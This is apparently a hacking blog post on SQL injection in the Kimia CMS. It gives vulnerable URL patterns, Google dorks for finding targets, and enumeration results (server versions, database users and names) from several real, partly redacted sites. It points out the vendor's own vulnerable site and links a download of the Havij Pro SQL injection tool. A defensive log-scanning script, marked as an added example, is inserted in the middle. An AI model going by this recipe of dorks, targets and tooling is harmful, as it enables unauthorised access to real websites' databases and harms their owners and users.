[sqli] Kimia

An old one, but still works fine!

http://packetstormsecurity.org/files/view/101202/kimia-sql.txt
http://www.securityhome.eu/exploits/exploit_pdf.php?eid=11754170304e409574e5f234.09320930

http://www.victim.com/image-details.php?id=[SQL]
http://www.victim.com/alert_article.php?id=[SQL]
http://www.victim.com/news-article.php?id=[SQL]
http://www.victim.com/gallery-list.php?id=[SQL]
http://www.victim.com/newsitem.php?id=[SQL]
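
If you run one of these sites, here is a log check for the pages listed above. It is an added example, not part of the original post: it flags requests where `id` is not a plain integer, assuming Apache combined-format access logs and that `id` is always numeric, as it is in the sample URLs further down. The function names and the log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Script names taken from the list above.
KIMIA_SCRIPTS = {
    "image-details.php", "alert_article.php", "news-article.php",
    "gallery-list.php", "newsitem.php",
}

# Request line of an Apache combined-format log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_id(line):
    """Return the decoded id value if the line requests a listed script
    with a non-integer id, otherwise None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    script = url.path.rsplit("/", 1)[-1].lower()
    if script not in KIMIA_SCRIPTS:
        return None
    # parse_qs percent-decodes, so encoded values are checked in clear form.
    # Repeated id parameters are all checked, not just the first one.
    for value in parse_qs(url.query, keep_blank_values=True).get("id", []):
        if not re.fullmatch(r"\d{1,10}", value):
            return value
    return None

def scan(lines):
    """Return (line_number, offending_value) for every flagged entry."""
    hits = []
    for n, line in enumerate(lines, 1):
        bad = suspicious_id(line)
        if bad is not None:
            hits.append((n, bad))
    return hits

# Constructed sample log lines (documentation IP range, not from a real server).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2012:10:00:00 +0000] "GET /gallery-list.php?id=18 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [01/Jan/2012:10:00:05 +0000] "GET /producer/newsitem.php?id=6%27 HTTP/1.1" 200 312 "-" "Mozilla/4.0"',
    '192.0.2.44 - - [01/Jan/2012:10:00:06 +0000] "GET /news-article.php?id=6+and+1%3D1 HTTP/1.1" 200 4800 "-" "Mozilla/4.0"',
    '192.0.2.10 - - [01/Jan/2012:10:00:09 +0000] "GET /contact.php?id=abc HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [01/Jan/2012:10:00:11 +0000] "GET /image-details.php?id=3&id=x HTTP/1.1" 200 900 "-" "Mozilla/4.0"',
]

if __name__ == "__main__":
    for lineno, value in scan(SAMPLE_LOG):
        print(f"line {lineno}: non-integer id {value!r}")
```

The same integer-only rule belongs in the PHP pages themselves, before the value reaches the query.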

First, some googling...

Google dorks:
inurl:”image-details.php?id=”
inurl:”alert_article.php?id=”
inurl:”news-article.php?id=”
inurl:”gallery-list.php?id=”
inurl:”newsitem.php?id=”

http://<removed for privacy>/gallery-list.php?id=18
http://<removed for privacy>/producer/newsitem.php?id=6
http://<removed for privacy>/article.php?id=159
http://<removed for privacy>/products.php?id=41

Of course, the makers:
http://www.kimia.co.za/newslist.php?interval=10&min=30&newsID=72
This one I won’t remove 😉 they are vulnerable themselves 😛

Target: http://<removed for privacy>
Host IP: <removed for privacy>
Web Server: Apache/2.2.9 (Debian) mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
Powered-by: PHP/5.2.6-1+lenny13
DB Server: MySQL >=5
Resp. Time(avg): 1678 ms
Current User: <removed for privacy>
Sql Version: 5.1.49-3~bpo50+1
Current DB:

System User: <removed for privacy>
Host Name: <removed for privacy>
Installation dir: /usr/
DB User: @’%’
Data Bases: information_schema
propeo_db1

Target: http://<removed for privacy>
Host IP: <removed for privacy>
Web Server: Apache/2.2.9 (Debian) mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
Powered-by: PHP/5.3.3-7+squeeze3+hetz2
DB Server: MySQL error based
Resp. Time(avg): 542 ms
Current User: @<removed for privacy>
Sql Version: 5.1.49-3~bpo50+1
Current DB:
System User: foxanr_1@<removed for privacy>
Host Name: <removed for privacy>
Installation dir: /usr/
DB User: @’%’
Data Bases: information_schema
foxanr_db1

Target: http://<removed for privacy>
Host IP: <removed for privacy>
Web Server: Apache/2.2.9 (Debian) mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
Powered-by: PHP/5.3.3-7+squeeze3+hetz2
DB Server: MySQL unknown ver
Resp. Time(avg): 1439 ms
Current User: @<removed for privacy>
Sql Version: 5.1.49-3~bpo50+1
Current DB:

System User: @<removed for privacy>
Host Name: <removed for privacy>
Installation dir: /usr/
DB User: @’%’
Data Bases: information_schema
joymag_db1

Target: http://<removed for privacy>
Host IP: <removed for privacy>
Web Server: Apache/2.2.9 (Debian) mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
Powered-by: PHP/5.3.3-7+squeeze3+hetz2
DB Server: MySQL unknown ver
Resp. Time(avg): 3148 ms
Current User: kimiaa_1@<removed for privacy>
Sql Version: 5.1.49-3~bpo50+1
Current DB: kimiaa_db1
System User: kimiaa_1?dedi110

Target: http://<removed for privacy>
Host IP: <removed for privacy>
Web Server: Apache/2.2.9 (Debian) mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
Powered-by: PHP/5.3.3-7+squeeze3+hetz2
DB Server: MySQL unknown ver
Resp. Time(avg): 2508 ms
Current User: @<removed for privacy>
Sql Version: 5.1.49-3~bpo50+1
Current DB: robassu_db1
System User: @<removed for privacy>
Host Name:

table structure:  http://dl.dropbox.com/u/4378489/Forums/evilzone/Kimia_tables.html

Use with Havij Pro 1.15
http://www.ziddu.com/download/17108226/Havij_1.15_Pro.rar.html 

5 thoughts on “[sqli] Kimia”

  1. Really educational stuff, man, your writing style is very entertaining.

    Keep writing and posting; if you posted more relevant && recent posts you would really draw traffic to your site. Your posts are awesome!

    Good job and keep it up man!

    Regards.
